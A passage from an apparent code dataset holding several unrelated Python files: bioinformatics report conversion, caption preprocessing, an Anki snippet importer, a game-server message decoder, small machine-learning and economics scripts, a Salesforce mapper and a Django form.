\n#\n# using lookbehind ?= 0.9 and decoy < circ * 0.1\n\n\ndef _is_this_r1_only_glm_bsj_positive(parts):\n if not parts:\n return False\n pv = float(parts[2])\n return pv >= 0.9 # this is also from KNIFE github page\n\n\ndef _is_this_combined_glm_bsj_positive(parts):\n if not parts:\n return False\n threshold_posterior = 0.9\n p_orig = float(parts[2])\n p_swap = float(parts[4])\n return p_orig >= threshold_posterior or p_swap >= threshold_posterior\n\n\ndef _is_this_combined_denovo_bsj_positive(parts):\n \"\"\" junction\torig_circOrLinear\torig_decoyOrAnom\torig_unmapped\torig_pval\tswapped_circOrLinear\tswapped_decoyOrAnom\tswapped_unmapped\tswapped_pval\ttotal_reads\n \"\"\"\n if not parts:\n return False\n\n pv_threshold = 0.9\n reads_rate_threshold = 0.1\n orig_circOrLinear, orig_decoyOrAnom, orig_pval = int(parts[1]), int(parts[2]), float(parts[4])\n swapped_circOrLinear, swapped_decoyOrAnom, swapped_pval = int(parts[5]), int(parts[6]), float(parts[8])\n\n by_r1 = orig_pval >= pv_threshold # and orig_decoyOrAnom < orig_circOrLinear * reads_rate_threshold\n by_r2 = swapped_pval >= pv_threshold # and swapped_decoyOrAnom < swapped_circOrLinear * reads_rate_threshold\n return by_r1 or by_r2\n\n\ndef _bsj_junction_to_bed(info_str, gene_id_mapping=None):\n \"\"\"junction: chr|gene1_symbol:splice_position|gene2_symbol:splice_position|junction_type|strand\n junction types are reg (linear),\n rev (circle formed from 2 or more exons),\n or dup (circle formed from single exon)\n \"\"\"\n\n seq_name, gene_splice_1, gene_splice_2, junction_type, strand = info_str.strip().split(\"|\")\n if junction_type == \"reg\":\n return None\n else:\n gene1, splice_1 = gene_splice_1.strip().split(\":\")\n gene2, splice_2 = gene_splice_2.strip().split(\":\")\n\n start_point = splice_1 if int(splice_1) < int(splice_2) else splice_2\n end_point = splice_2 if int(splice_1) < int(splice_2) else splice_1\n\n gene_name = gene1 if gene1 == gene2 else \"n/a\"\n field_gene = gene_id_mapping.get(gene_name, \"n/a\") if gene_id_mapping else gene_name\n\n name_bsj = \"{chr}:{start_nt}|{end_nt}@{gene}\".format(chr=seq_name, start_nt=str(int(start_point) + 1),\n end_nt=end_point,\n gene=field_gene)\n return \"\\t\".join([seq_name, start_point, end_point, name_bsj, \"0\", strand])\n\n\ndef __dump_bed_line_list_to(all_bed_lines, output_bed_file_path):\n with open(output_bed_file_path, \"w\") as op:\n for line in all_bed_lines:\n op.write(\"{}\\n\".format(line.strip()))\n\n\ndef pick_glm_report(file_name):\n return file_name.strip().endswith(\"circJuncProbs.txt\")\n\n\ndef pick_denovo_report(file_name):\n return file_name.strip().endswith(\"report.txt\") and \"unaligned\" not in file_name\n\n\ndef __get_file_under(tap_root, sub_dir, func_to_pick_report):\n report_sub_dir = os.path.join(tap_root, sub_dir)\n if os.path.exists(report_sub_dir) and os.path.isdir(report_sub_dir):\n contents_file = os.listdir(report_sub_dir)\n if contents_file:\n file_you_need = [x.strip() for x in contents_file if func_to_pick_report(x.strip())][0]\n return os.path.join(report_sub_dir, file_you_need)\n else:\n raise FileNotFoundError(\"no files under this folder: {}\".format(report_sub_dir))\n else:\n raise NotADirectoryError(\"no such folder: {}.\".format(report_sub_dir))\n\n\ndef transform_each_line(report_file, func_to_check_bsj, header_line_num, gene_id_mapping=None):\n bed_lines_this_file = []\n with open(report_file) as report_it:\n for x in range(header_line_num):\n report_it.readline()\n for line in report_it:\n _process_line(line, bed_lines_this_file, func_to_check_bsj, gene_id_mapping)\n return bed_lines_this_file\n\n\ndef __report_glm_combined(dir_knife, gene_id_mapping=None):\n # here we assume the combined glm report is that file with suffix: circJuncProbs.txt under the\n # circReads/combinedReports folder .\n report_file = __get_file_under(dir_knife, _SUB_DIR_COMBINED_REPORT, pick_glm_report)\n\n _logger.debug(\"now loading {}\".format(report_file))\n\n bed_lines_this_file = transform_each_line(report_file, _is_this_combined_glm_bsj_positive, 1, gene_id_mapping)\n\n return bed_lines_this_file\n\n\ndef __report_glm_read1_only(dir_knife, gene_id_mapping=None):\n report_file = __get_file_under(dir_knife, _SUB_DIR_READ1_GLM_REPORT, pick_glm_report)\n _logger.debug(\"now loading {}\".format(report_file))\n bed_outputs = transform_each_line(report_file, _is_this_r1_only_glm_bsj_positive, 1, gene_id_mapping)\n return bed_outputs\n\n\ndef __report_denovo_combined(dir_knife, gene_id_mapping=None):\n report_file = __get_file_under(dir_knife, _SUB_DIR_COMBINED_REPORT, pick_denovo_report)\n _logger.debug(\"now loading {}\".format(report_file))\n bed_contents = transform_each_line(report_file, _is_this_combined_denovo_bsj_positive, 1, gene_id_mapping)\n return bed_contents\n\n\ndef __report_denovo_read1_only(dir_knife, gene_id_mapping=None):\n report_file = __get_file_under(dir_knife, _SUB_DIR_READ1_DENOVO_REPORT, pick_denovo_report)\n _logger.debug(\"now loading {}\".format(report_file))\n bed_lines = transform_each_line(report_file, _is_this_r1_only_denovo_bsj_positive, 2, gene_id_mapping)\n return bed_lines\n\n\n# here we confirmed that this is a configuration file\ndef __infer_knife_output_directory(cfg_file):\n if os.path.exists(cfg_file) and os.path.isfile(cfg_file):\n user_config = pysrc.body.config.config(cfg_file)\n dir_par = user_config[pysrc.wrapper.knife.SECTION_DETECT][pysrc.wrapper.knife._OPT_ALIGNMENT_PARENT_DIRECTORY]\n dir_object = user_config[pysrc.wrapper.knife.SECTION_DETECT][pysrc.wrapper.knife._OPT_DATA_SET_NAME]\n putative_dir = os.path.join(dir_par, dir_object)\n if os.path.exists(putative_dir) and os.path.isdir(putative_dir):\n return putative_dir\n else:\n raise NotADirectoryError(\"Unable to get the right path from : {}.\".format(cfg_file))\n else:\n raise FileNotFoundError(\"Unable to find the cfg_file in : {}.\".format(cfg_file))\n\n\ndef main(cfg_path, is_conserve, is_use_swapped, anno_file):\n dir_knife_output = __infer_knife_output_directory(cfg_path)\n\n gene_name_id_mapping = load_mapping_info_from_gtf(anno_file) if anno_file and os.path.exists(anno_file) else None\n\n if is_conserve: # use only glm report\n if is_use_swapped: # glm_combined\n bed_lines = __report_glm_combined(dir_knife_output, gene_name_id_mapping)\n else: # glm_r1\n bed_lines = __report_glm_read1_only(dir_knife_output, gene_name_id_mapping)\n else:\n if is_use_swapped: # glm_combined, and denovo_combined\n bed_lines = __report_glm_combined(dir_knife_output, gene_name_id_mapping)\n bed_lines.extend(__report_denovo_combined(dir_knife_output, gene_name_id_mapping))\n else: # glm_r1 and denovo_r1\n bed_lines = __report_glm_read1_only(dir_knife_output, gene_name_id_mapping)\n bed_lines.extend(__report_denovo_read1_only(dir_knife_output, gene_name_id_mapping))\n\n bed_path = os.path.join(dir_knife_output, BED_FORMAT_OUTPUT_FILE_NAME)\n __dump_bed_line_list_to(bed_lines, bed_path)\n return bed_path\n\n\ndef __cli_arg_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"cfg_file\", help=\"path to the config file, KNIFE setting is required\")\n parser.add_argument(\"-c\", \"--conserve\", help=\"use annotation powered glm report only\", action=\"store_true\")\n parser.add_argument(\"-s\", \"--use_swapped\", help=\"use both reads instead only read 1\", action=\"store_true\")\n parser.add_argument(\"-a\", \"--anno\", help=\"path for annotation file , which provide the name id mapping info\",\n default=\"\")\n return parser\n\n\nif __name__ == \"__main__\":\n arg_parser = __cli_arg_parser()\n args = arg_parser.parse_args()\n _logger.debug(\"config_file is {}\".format(args.cfg_file))\n _logger.debug(\"use glm only : {}\".format(args.conserve))\n _logger.debug(\"use combined report : {}\".format(args.use_swapped))\n _logger.debug(\"user defined annotation file: {}\".format(args.anno))\n print(main(args.cfg_file, args.conserve, args.use_swapped, args.anno))\n","sub_path":"trans_knife_report.py","file_name":"trans_knife_report.py","file_ext":"py","file_size_in_byte":10348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"5014906","text":"\"\"\"\nThis code preprocesses captions from a CSV file, and saves it as a json.\n\njson file will have the form (a list of dictionaries)\n[{ file_loc: 'path/to/image/set/',\n file_names: ['1.jpg', '2.jpg', ...],\n captions: ['sentence_1', 'sentence_2', ...],\n id: }, ...]\n\nTO DO: Modify so that it processes folders with <10 images as well\n\"\"\"\n\nimport os\nimport json\nimport csv\n\ndata_paths = list(os.walk('/local-scratch2/ajakash/aabdujyo/2017_set_compression/Data/Sets_12500'))\n\nwith open('sets/Category Image Description - Sheet1.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n# reader_utf_8 = utf_8_encoder(reader)\n\n out = []\n # Add a dictionary of items per image set\n for row in reader:\n if row[1] == 'Description' or row[1] == 'Empty':\n continue\n\n #print row\n\n filenames = [x[0].split('/')[-1] for x in data_paths]\n loc = filenames.index(row[0])\n #print loc\n #print data_paths[loc]\n\n # Currently taking\n if len(data_paths[loc][2]) == 10:\n set_info = {}\n set_info['file_loc'] = data_paths[loc][0]\n set_info['file_names'] = data_paths[loc][2]\n\n caption = row[1].split('.')\n if caption[-1]=='':\n caption = caption[:-1]\n\n set_info['captions'] = caption\n set_info['id'] = loc\n\n #print set_info\n out.append(set_info)\n\n json.dump(out, open('sets/sets_raw.json', 'w'))\n\n #print out","sub_path":"preprocess_sets.py","file_name":"preprocess_sets.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"297741883","text":"# -*- coding: utf-8 -*-\n\n#******************************************************************************\n# gen boost snip.py, the main program file\n#\n# TreeLine, an information storage program\n# Copyright (C) 2017, Michael Cold\n#\n# This is free software; you can redistribute it and/or modify it under the\n# terms of the GNU General Public License, either Version 2 or any later\n# version. This program is distributed in the hope that it will be useful,\n# but WITTHOUT ANY WARRANTY. See the included LICENSE file for details.\n#******************************************************************************\n\n\"\"\"\n Module give opportunity to generate anki-data cards from boost snippets\n The type of cards for anki - 'passes'\n The fields - 'name of theme' - 'snippet'\n Algoritm: take header '### ' as 'name of theme'\n take text in '''_____''' as 'snippet'\n Intermediate format of data is dbas SQLite in order to backup data\n 1. insert data into DB\n 2. generate data from DB\n\"\"\"\n\nimport os\nimport m_sqlite\nimport codecs\nimport sys\nimport generator\nfrom peewee import *\n\n\n__progname__ = 'gen boost snip'\n__version__ = '0.1.0'\n__author__ = 'Michael Cold'\n\ndb = SqliteDatabase(r'C:\\Users\\mcold\\Dropbox\\Python projects\\anki prop from boost\\snips.db')\n\ndef gen_dirs(dir_path):\n \"\"\"\n Generate dictionary of direoctories boosts\n :param dir_path: root of direcotry boosts\n :return: dictionary of dirs boosts\n \"\"\"\n # dir_path = r'C:\\Users\\mcold\\Dropbox\\boosts'\n l_dirs_boosts = os.listdir(dir_path) # list of dirs boosts\n d_dirs = dict()\n dir_path = '{0}\\\\'.format(dir_path)\n dir_path.replace(r'\\\\\\\\', r'\\\\')\n for k in range(len(l_dirs_boosts)):\n dir_boost = dir_path + l_dirs_boosts[k]\n d_dirs[l_dirs_boosts[k]] = dir_boost\n return d_dirs\n\ndef take_dirs():\n \"\"\"\n Generate dictionary of direoctories boosts\n :return: dictionary of dirs boosts\n \"\"\"\n dir_path = ''\n if sys.platform.startswith('win'):\n dir_path = r'C:\\Users\\mcold\\Dropbox\\boosts'\n else:\n dir_path = r'/home/mcold/Dropbox/boosts/'\n d_dirs = gen_dirs(dir_path)\n return d_dirs\n\ndef take_file_dir(dir):\n \"\"\"\n Take names of files with snippets from directory\n :param: directory\n :return: list of files .cson (boosts) in dir\n \"\"\"\n dir = dir + '\\\\notes'\n ls = os.listdir(dir)\n l_snips = list()\n for i in range(len(ls)):\n if ls[i].endswith(\".cson\"):\n l_snips.append(ls[i])\n return l_snips\n\n\ndef ins_snips_dir(l_snips, s_dir, s_storage):\n \"\"\"\n Function return list of snips for 1 storage\n :param l_snips: files of snippets\n :param dir: directory of files\n :return: headers of snips\n \"\"\"\n\n b_found_title = False # bool found title of snippet\n b_found_snip = False # bool found snip\n b_found_sub = False # bool found substitution\n s_title = '' # title of snippet\n s_snip = '' # snippet\n\n\n\n for i in range(len(l_snips)):\n name_file = s_dir + '\\\\notes\\\\' + l_snips[i]\n f_snip = codecs.open(name_file, \"r\", \"utf-8\")\n # f_snip = open(r'{0}'.format(name_file), \"r\")\n while True:\n line = f_snip.readline()\n line = line.strip()\n if line.startswith('### '):\n b_found_title = True\n if line.find(\"''''\") > 0:\n if b_found_snip == True: # if had found snip yet -> write to DB\n # -> False - snip is gone out\n if b_found_title and b_found_sub: # so insert data into db\n m_sqlite.ins_data(s_title, s_snip, s_storage)\n b_found_snip = False\n b_found_title = False\n b_found_sub = False\n s_title = '' # & title is empty\n s_snip = '' # & snip is empty\n else:\n b_found_snip = True\n if line.find('{{') > 0:\n b_found_sub = True\n if b_found_title and b_found_snip: # if title and snip found add to text of snip\n s_snip = s_snip + line\n if line.startswith('updatedAt:'):\n break\n f_snip.close()\n\n\ndef add_div_line(line):\n \"\"\"\n Add
in sides of line\n\n :param line: string\n :return: string with
...
\n \"\"\"\n res = '
' + line + '
'\n return res\n\n\n\ndef ins_snips_file(s_file, s_storage):\n b_found_title = False # bool found title of snippet\n b_found_snip = False # bool found snip\n b_found_sub = False # bool found substitution\n s_title = '' # title of snippet\n s_snip = '' # snippet\n n_empty = 0 # define condition break cycle\n f_snip = codecs.open(s_file, \"r\", \"utf8\")\n # f_snip = open(r'{0}'.format(name_file), \"r\")\n\n\n l = f_snip.read().split('\\n')\n # line = f_snip.readline()\n\n\n for i in range(len(l)):\n if l[i].find('##') > 0:\n s_title = an_line(l[i])\n b_found_title = True\n if l[i].find(\"```\") > 0:\n if b_found_snip == True: # if had found snip yet -> write to DB\n # -> False - snip is gone out\n if b_found_title and b_found_sub: # so insert data into db\n try:\n ins_data(s_title, s_snip, s_storage)\n except:\n continue\n b_found_snip = False\n b_found_title = False\n b_found_sub = False\n s_title = '' # & title is empty\n s_snip = '' # & snip is empty\n else:\n b_found_snip = True\n if l[i].find('{{') > 0:\n b_found_sub = True\n if b_found_title and b_found_snip: # if title and snip found add to text of snip\n if l[i].find(\"```\") > 0:\n continue\n s_snip = s_snip + add_div_line(l[i])\n n_empty = 0\n if l[i].startswith('updatedAt:'):\n break\n if l[i] == '' or l[i] == '\\n':\n n_empty += 1\n if n_empty == 4:\n break\n\n f_snip.close()\n\n\n\n\n\ndef an_line(line):\n \"\"\"\n Function for analyze line of file - for reduce ## in start of line\n :param line: line of file\n :return: line without # symbols\n \"\"\"\n res = ''\n for i in range(len(line)):\n if not line[i] == '#':\n res = res + line[i]\n return res.strip() + '\\n'\n\ndef cycle_dir():\n \"\"\"\n Function execute cycle of generation anki-cards\n :return:\n \"\"\"\n m_sqlite.cr_db_table() # create database & table snip\n d_dirs = take_dirs()\n for k in d_dirs:\n name_storage = k\n l_files = take_file_dir(d_dirs[k]) # take files from each dir\n # snips = ins_snips_dir(l_files, d_dirs[k], name_storage)\n for i in range(len(l_files)):\n ins_snips_file(d_dirs[k] + '\\\\notes\\\\' + l_files[i], k)\n\n\nclass snip(Model):\n id = IntegerField()\n c_storage = CharField()\n c_title = CharField(unique=True) # title of snippet\n c_snip = CharField() # snippet\n\n class Meta:\n database = db\n\n\ndef next_id(instance):\n \"\"\"\n Count next id of item for instance\n :param instance:\n :return: next id\n \"\"\"\n # find max value of temp_id in model\n # increment it by one and assign it to model instance object\n try:\n e = instance.__name__ + '.select(fn.Max(' + instance.__name__ + '.id))[0].id + 1'\n next_value = eval(e)\n except:\n next_value = 1\n return next_value\n\n\ndef take_snips():\n \"\"\"\n Take list of snips\n :return:\n \"\"\"\n l = []\n for s in snip.select():\n l.append(s.c_author)\n return l\n\n\ndef cr_db_table():\n \"\"\"\n Create database and table snip in that\n :return:\n \"\"\"\n try:\n db = SqliteDatabase('snip.db')\n except:\n pass\n try:\n snip.create_table()\n\n except:\n pass\n\n\ndef ins_data(s_title, s_snip, s_storage):\n \"\"\"\n Insert data into table snips\n :param s_title: title\n :param s_snip: snippet\n :return:\n \"\"\"\n\n snip.create(id=next_id(snip), c_title=s_title, c_snip=s_snip, c_storage=s_storage)\n\n try:\n snip.create(id = next_id(snip), c_title = s_title, c_snip = s_snip, c_storage = s_storage)\n except:\n pass\n\ndef take_list_ins():\n s_storage = os.path.abspath(os.curdir).split('\\\\')[-1]\n l_files = []\n ls = os.listdir()\n for i in range(len(ls)):\n if ls[i].endswith('.cson'):\n l_files.append(ls[i])\n for j in range(len(l_files)):\n ins_snips_file((l_files[j]), s_storage)\n\nif __name__ == '__main__':\n cycle_dir() # insert data\n generator.generate_data() # generate data\n\n","sub_path":"gen_boost_snip.py","file_name":"gen_boost_snip.py","file_ext":"py","file_size_in_byte":8909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"594479050","text":"from habbohotel.Game import Game\nfrom messages.incoming.ClientMessage import ClientMessage\n\n\nclass MessageDecoder:\n\n @staticmethod\n def parse(session, msg):\n if msg[0] == 60:\n session.send(\"\\r\\n\"\n + \"\\r\\n\"\n + \"\\r\\n\"\n + \"\\r\\n\"\n + \"\\0\")\n else:\n stream = ClientMessage(msg)\n length = stream.read_int()\n header = stream.read_short()\n\n Game.packet_handler.handle_message(session, header, stream)","sub_path":"messages/codec/MessageDecoder.py","file_name":"MessageDecoder.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"283287498","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import GradientBoostingClassifier\ndata=pd.read_csv('red.csv')\nx=data[['fixed acidity','volatile acidity','citric acid','residual sugar','chlorides','free sulfur dioxide','total sulfur dioxide','density','pH','sulphates','alcohol']]\ny=data['quality']\nclf=GradientBoostingClassifier(n_estimators=82, learning_rate=0.1,max_depth=1, random_state=0)\nclf.fit(x,y)\ntest=pd.read_csv('red_test.csv')\nx=test[['fixed acidity','volatile acidity','citric acid','residual sugar','chlorides','free sulfur dioxide','total sulfur dioxide','density','pH','sulphates','alcohol']]\ny=test['quality']\np=clf.predict(x)\nprint(clf.score(x,y))\nprint(clf.feature_importances_)\n","sub_path":"red_gradboost.py","file_name":"red_gradboost.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"58157257","text":"import json\nfrom parsers.aws_parser import AWSParser\nfrom models.subnet import Subnet\n\nclass SubnetParser(AWSParser):\n \n def parse(self):\n parsed_subnets = []\n for subnet in self.json[\"Subnets\"]:\n cur_subnet = Subnet()\n cur_subnet.subnet_id = subnet[\"SubnetId\"]\n cur_subnet.vpc_id = subnet[\"VpcId\"]\n cur_subnet.availability_zone = subnet[\"AvailabilityZone\"]\n cur_subnet.available_ip_address_count = subnet[\"AvailableIpAddressCount\"]\n cur_subnet.cidr = subnet[\"CidrBlock\"]\n cur_subnet.state = subnet[\"State\"]\n cur_subnet.tags = self.get_tag_dict(subnet.get(\"Tags\",[]))\n parsed_subnets.append(cur_subnet)\n return parsed_subnets\n\n","sub_path":"parsers/subnet_parser.py","file_name":"subnet_parser.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"611700420","text":"#Theft and Fraud model\nimport random\nimport sys\nimport numpy as np\nimport scipy.stats as sp\nimport matplotlib.pyplot as plt\n\ndef transaction(array):\n\t#Randomly select two traders\n\ttraderA = random.randint(0,int(sys.argv[1])-1)\n\ttraderB = random.randint(0,int(sys.argv[1])-1)\n\twhile traderA == traderB:\n\t\ttraderB = random.randint(0,int(sys.argv[1])-1)\n\ttraderAworth = array[traderA]\n\ttraderBworth = array[traderB]\n\n\t#Randomly generate a profit for one trader equal to the loss of the other trader\n\t#In this model, the profit is some fraction of the loser's worth\n\tprofit = random.randint(0, traderBworth)\n\ttraderAworth += profit\n\ttraderBworth -= profit\n\tarray[traderA] = traderAworth\n\tarray[traderB] = traderBworth\n\n\t#Return updated array of traders and their worths\n\treturn array\n\n#Initialize an array of traders all with net worth 100\ntraders = [100]*int(sys.argv[1])\n\n#Run a specified number of transactions\nfor i in range(0,int(sys.argv[2])):\n\ttraders = transaction(traders)\n\n#Show results\n#print traders\n\n#Calculate percentiles and create histogram data\npercentiles = [sp.percentileofscore(traders, i) for i in traders]\ndata = []\n\n#This is my cheat for creating data that represents the wealth distribution.\n#There's got to be a python library for this\nfor i in range (0,len(traders)):\n\tif traders[i] != 0:\n\t\tdata = data + [percentiles[i]]* traders[i]\n\nbins = [0,10,20,30,40,50,60,70,80,90,100]\n\n#Plot results as histogram\nplt.hist(data, bins)\nplt.title(\"Theft-and-fraud model of \" + str(sys.argv[1]) + \" traders after \" + str(sys.argv[2]) + \" transactions\")\nplt.xlabel(\"Percentile\")\nplt.ylabel(\"Wealth\")\nplt.show()\n","sub_path":"YardsaleEcon/theftandfraud.py","file_name":"theftandfraud.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"134083044","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Author: Nicolas Bessi\n# Copyright 2014 Camptocamp SA\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\nfrom openerp.addons.connector.unit.mapper import ImportMapper\nfrom openerp.addons.connector.exception import MappingError\n\n\nclass AddressMapper(ImportMapper):\n\n def _state_id(self, record, state_key, country_key):\n state = record.get(state_key)\n if not state:\n return False\n state_id = self.session.search(\n 'res.country.state',\n [('name', '=', state)]\n )\n if state_id:\n return state_id[0]\n else:\n country_id = self._country_id(record, country_key)\n if country_id:\n return self.session.create(\n 'res.country.state',\n {'name': state,\n 'country_id': country_id}\n )\n return False\n\n def _country_id(self, record, country_key):\n \"\"\"Map Salesforce countrycode to Odoo code\"\"\"\n country_code = record.get(country_key)\n if not country_code:\n return False\n country_id = self.session.search(\n 'res.country',\n [('code', '=', country_code)]\n )\n # we tolerate the fact that country is null\n if len(country_id) > 1:\n raise MappingError(\n 'Many countries found to be linked with partner %s' % record\n )\n\n if not country_id:\n country_id = False\n raise MappingError(\n \"No country %s found when mapping partner %s\" % (\n country_code,\n record\n )\n )\n return country_id[0] if country_id else False\n\n def _title_id(self, record, title_key):\n title = record.get(title_key)\n if not title:\n return False\n title_id = self.session.search(\n 'res.partner.title',\n [('name', '=', title)],\n )\n if len(title_id) > 1:\n raise MappingError(\n 'Many countitle found to be linked with partner %s' % record\n )\n if title_id:\n return title_id[0]\n return self.session.create(\n 'res.partner.title',\n {'name': title}\n )\n\nclass PriceMapper(ImportMapper):\n\n def get_currency_id(self, record):\n currency_iso_code = record.get('CurrencyIsoCode')\n if not currency_iso_code:\n raise MappingError(\n 'No currency Given for: %s' % record\n )\n currency_id = self.session.search(\n 'res.currency',\n [('name', '=ilike', currency_iso_code)]\n )\n if not currency_id:\n raise MappingError(\n 'No %s currency available. '\n 'Please create one manually' % currency_iso_code\n )\n if len(currency_id) > 1:\n raise ValueError(\n 'Many Currencies found for %s. '\n 'Please ensure your multicompany rules are corrects '\n 'or check that the job is not runned by '\n 'the admin user' % currency_iso_code\n )\n return currency_id[0]\n","sub_path":"connector_salesforce/unit/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"125688040","text":"import pandas as pd\nimport numpy as np\nimport math\nimport os\n\n\ndef output_data(root,file,add_casename):\n roi_path = os.path.join(root, file)\n roi_data = pd.read_csv(roi_path, encoding='gbk')\n if 'name' in roi_data.columns.values:\n roi_data.drop('name', axis=1, inplace=True)\n\n roi_data['path'] = roi_path\n\n if add_casename == True:\n patient_name = root[root.find('formal') + 7:]\n if '^^' in patient_name:\n patient_name = patient_name[:patient_name.find('^^')]\n if file[0:-4] == 'roi':\n roi_name = ''\n else:\n roi_name = '_' + file[3]\n roi_data.insert(0, 'casename', patient_name + roi_name)\n else:\n roi_data.rename(columns={'Unnamed: 0':'casename'},inplace=True)\n\n return roi_data\n\n\ndef merge_roi(dir_path,out_path,add_casename):\n df = pd.DataFrame()\n for root,dirs,files in os.walk(dir_path):\n if dirs:\n for dir in dirs:\n dir_path = os.path.join(root,dir)\n file_list = os.listdir(dir_path)\n if 'roi1.csv' in file_list:\n roi_data = output_data(dir_path,'roi0.csv',add_casename)\n df = pd.concat([roi_data, df], axis=0, sort=False)\n\n roi_data = output_data(dir_path,'roi1.csv',add_casename)\n df = pd.concat([roi_data,df],axis=0,sort=False)\n # print(df)\n else:\n roi_data = output_data(dir_path, 'roi.csv', add_casename)\n roi_num = roi_data.shape[0]\n if 'Unnamed: 0' in roi_data.columns.values.tolist():\n for i in range(roi_num):\n roi_data['casename'][i] += ('_'+str(roi_data['Unnamed: 0'][i]))\n\n roi_data.drop('Unnamed: 0',axis=1,inplace=True)\n df = pd.concat([roi_data, df], axis=0, sort=False)\n\n df.insert(len(df.columns.values.tolist())-1, 'path', df.pop('path'))\n df.to_csv(out_path,index=None)\n\n col1 = df.columns.values.tolist()[0]\n df1 = df.duplicated(col1,keep=False)\n df2 = df.duplicated(col1,keep='first')\n print(df2.append(df1).drop_duplicates(keep=False))\n\n\ndef stat_PIRADS(csv_path):\n df = pd.read_csv(csv_path)\n data = df['PIRADS'].values\n hist=[0,0,0,0,0,0]\n for val in data:\n try:\n hist[round(float(val))] += 1\n except:\n print(val)\n\n print(hist)\n\n\ndef concate_csv(csv_path1,csv_path2,save_path):\n csv1 = pd.read_csv(csv_path1)\n csv2 = pd.read_csv(csv_path2)\n\n csv = pd.concat([csv1,csv2],axis=0,sort=False)\n csv.insert(len(csv.columns.values.tolist()) - 1, 'path', csv.pop('path'))\n csv.to_csv(save_path,index=None)\n\n\ndef add_PIRADS(all_path,PIRADS_path):\n all_data = pd.read_csv(all_path)\n pirads_data = pd.read_csv(PIRADS_path, encoding='utf-8')\n id_list = pirads_data['ID'].values.tolist()\n\n for i in range(all_data.shape[0]):\n id = all_data['ID'][i]\n if id in id_list:\n all_data['PIRADS'][i] = pirads_data[pirads_data['ID']==id]['PIRADS'].astype(\"int\").values[0]\n\n all_data.to_csv(all_path,index=None)\n\n\n# merge_roi(r'W:\\PrcoessedData\\JSPH_PCa\\DWI1500',r'D:\\PycharmProjects\\learning\\PIRADS\\data\\PCa_roi.csv',add_casename=True)\n# merge_roi(r'W:\\PrcoessedData\\PCaLNI\\OneRoiFiles',r'D:\\PycharmProjects\\learning\\PIRADS\\data\\LNI_roi.csv',add_casename=False)\n\n# add_PIRADS(r'D:\\PycharmProjects\\learning\\PIRADS\\data\\PCa_roi.csv',r'D:\\PycharmProjects\\learning\\PIRADS\\data\\JSPH-2016-raw.csv')\n\n# merge_roi(r'W:\\PrcoessedData\\PI-RADS',r'D:\\PycharmProjects\\learning\\PIRADS\\data\\all_info.csv',add_casename=True)\n\n# stat_PIRADS(r'D:\\PycharmProjects\\learning\\PIRADS\\data\\LNI_roi.csv')\n# stat_PIRADS(r'D:\\PycharmProjects\\learning\\PIRADS\\data\\PCa_roi.csv')\n\n# concate_csv(r'D:\\PycharmProjects\\learning\\PIRADS\\data\\LNI_roi.csv',r'D:\\PycharmProjects\\learning\\PIRADS\\data\\PCa_roi.csv',\n# r'D:\\PycharmProjects\\learning\\PIRADS\\data\\all_roi.csv')\n# stat_PIRADS(r'D:\\PycharmProjects\\learning\\PIRADS\\data\\all_roi.csv')\n\n","sub_path":"pretreatment/roi_to_csv.py","file_name":"roi_to_csv.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"1442012","text":"import json\nimport re\n\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import RegexValidator, validate_slug\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext as _\nfrom django import forms\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, Div, HTML\n\nfrom dimagi.utils.decorators.memoized import memoized\n\nfrom .models import (CustomDataFieldsDefinition, CustomDataField,\n CUSTOM_DATA_FIELD_PREFIX)\n\n\nclass CustomDataFieldsForm(forms.Form):\n \"\"\"\n The main form for editing a custom data definition\n \"\"\"\n data_fields = forms.CharField(widget=forms.HiddenInput)\n\n def verify_no_duplicates(self, data_fields):\n errors = set()\n slugs = [field['slug'].lower()\n for field in data_fields if 'slug' in field]\n for slug in slugs:\n if slugs.count(slug) > 1:\n errors.add(_(\"Key '{}' was duplicated, key names must be \"\n \"unique.\").format(slug))\n return errors\n\n def clean_data_fields(self):\n raw_data_fields = json.loads(self.cleaned_data['data_fields'])\n errors = set()\n data_fields = []\n for raw_data_field in raw_data_fields:\n data_field_form = CustomDataFieldForm(raw_data_field)\n data_field_form.is_valid()\n data_fields.append(data_field_form.cleaned_data)\n if data_field_form.errors:\n errors.update([error[0]\n for error in data_field_form.errors.values()])\n\n errors.update(self.verify_no_duplicates(data_fields))\n\n if errors:\n raise ValidationError('
